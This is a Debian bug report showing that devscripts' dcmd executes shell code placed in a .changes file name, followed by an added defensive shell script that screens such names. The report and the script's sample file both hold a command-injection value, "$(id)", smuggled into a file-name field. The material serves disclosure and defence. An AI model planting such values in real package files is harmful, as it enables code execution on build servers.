#1139271 dcmd: Arbitrary code execution in `dcmd echo`

Package: devscripts
Source: devscripts
Description: scripts to make the life of a Debian Package maintainer easier
Submitter: kpcyrd
Date: 2026-06-07 23:31:01 UTC
Severity: normal
Tags:

#1139271#5
Date: 2026-06-07 23:29:27 UTC
From:
To:

hello!

When I read through #1138907 the error message caught my attention and I crafted
a .changes file that executes arbitrary code when processed:
  ffffffffffffffffffffffffffffffff 1337 abc optional "$(id)"
--- >8 ---

$ /usr/bin/dcmd echo hax.changes
uid=1000(user) gid=1000(user) groups=1000(user),27(sudo),112(sbuild) hax.changes

This creates an undocumented execution path that may cross security boundaries
on Debian build server infrastructure.

This bug is related to #1138923.

Sincerely,
kpcyrd
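
A defensive pre-check for the situation reported above, as an added example that is not part of the original report and not devscripts code: before an untrusted .changes file is handed to dcmd, refuse any Files or Checksums-* entry whose file name falls outside a conservative allow-list. The function name `check_changes_names`, the allow-list, the expected field counts and the sample files are assumptions of this example.

```shell
#!/bin/sh
# Added example, not devscripts code; check_changes_names is a hypothetical name.
# Lists entries in the Files / Checksums-* fields of a .changes or .dsc whose
# file name is outside a conservative allow-list (an assumption of this example)
# or whose line has an unexpected number of fields. Returns 0 if all pass, else 1.
check_changes_names() {
    awk '
        /^$/      { list = 0; next }           # blank line ends the paragraph
        /^[^ \t]/ {                            # a new field starts in column 1
            list = 0
            if ($0 ~ /^Files:/) list = 1
            else if ($0 ~ /^Checksums-[A-Za-z0-9]+:/) list = 2
            next
        }
        list && NF > 0 {                       # continuation line of a file list
            ok = (list == 1) ? (NF == 3 || NF == 5) : (NF == 3)
            if (!ok || $NF !~ /^[A-Za-z0-9][A-Za-z0-9._+~-]*$/) {
                print "rejected:" $0
                bad = 1
            }
        }
        END { exit bad + 0 }
    ' "$1"
}

# Constructed sample input. The quoted heredoc delimiter keeps the shell
# from expanding anything while the files are written.
tmp=$(mktemp -d)
cat > "$tmp/ok.changes" <<'EOF'
Format: 1.8
Source: hello
Checksums-Sha256:
 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 1024 hello_1.0-1_amd64.deb
Files:
 0123456789abcdef0123456789abcdef 1024 utils optional hello_1.0-1_amd64.deb
EOF
cat > "$tmp/hax.changes" <<'EOF'
Format: 1.8
Source: abc
Files:
 ffffffffffffffffffffffffffffffff 1337 abc optional "$(id)"
EOF

for f in "$tmp/ok.changes" "$tmp/hax.changes"; do
    if check_changes_names "$f"; then echo "${f##*/}: ok"
    else echo "${f##*/}: refused, do not pass to dcmd"; fi
done
```

The field-count test matters as much as the character test: a name containing whitespace would otherwise be judged only by its last word.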